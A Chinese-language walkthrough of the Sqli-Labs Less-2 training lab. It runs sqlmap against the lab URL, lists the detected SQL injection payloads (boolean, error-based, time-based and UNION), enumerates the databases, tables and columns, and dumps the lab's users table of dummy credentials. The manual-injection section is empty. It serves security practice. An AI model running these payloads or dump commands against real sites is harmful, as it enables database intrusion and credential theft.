Sqli-Labs-Less2_GET_Error Based_Integer_Based

时间:2022-05-13 03:46:29

题目地址:http://web-labs.rinue.top/sqli-labs/Less-2

方法一:SQLmap

sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch 
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8793=8793

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 7770 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT (ELT(7770=7770,1))),0x7178706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 6195 FROM (SELECT(SLEEP(5)))dCRn)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6064 UNION ALL SELECT NULL,NULL,CONCAT(0x71767a6b71,0x7668425342434b6e77446c74636950446778495a765543756c7a77524556537a78714a464d5a6a4b,0x7178706a71)-- RFsl

查询数据库

sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch --dbs
available databases [8]:                                                                 
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] Python
[*] security
[*] SQL5
[*] YaoGuang

查询数据库中的表

sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch -D security --tables
Database: security                                                                       
[4 tables]
 ---------- 
| emails   |
| referers |
| uagents  |
| users    |
 ---------- 

查询表中的字段

sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch -D security -T users --columns
Database: security                                                                       
Table: users
[3 columns]
 ---------- ------------- 
| Column   | Type        |
 ---------- ------------- 
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
 ---------- ------------- 

查询表中的内容

Database: security                                                                       
Table: users
[13 entries]
 ------------ ---------- 
| password   | username |
 ------------ ---------- 
| Dumb       | Dumb     |
| I-kill-you | Angelina |
| [email protected]   | Dummy    |
| crappy     | secure   |
| stupidity  | stupid   |
| genious    | superman |
| mob!le     | batman   |
| admin      | admin    |
| admin1     | admin1   |
| admin2     | admin2   |
| admin3     | admin3   |
| dumbo      | dhakkan  |
| admin4     | admin4   |
 ------------ ---------- 

方法二:手工注入

。。。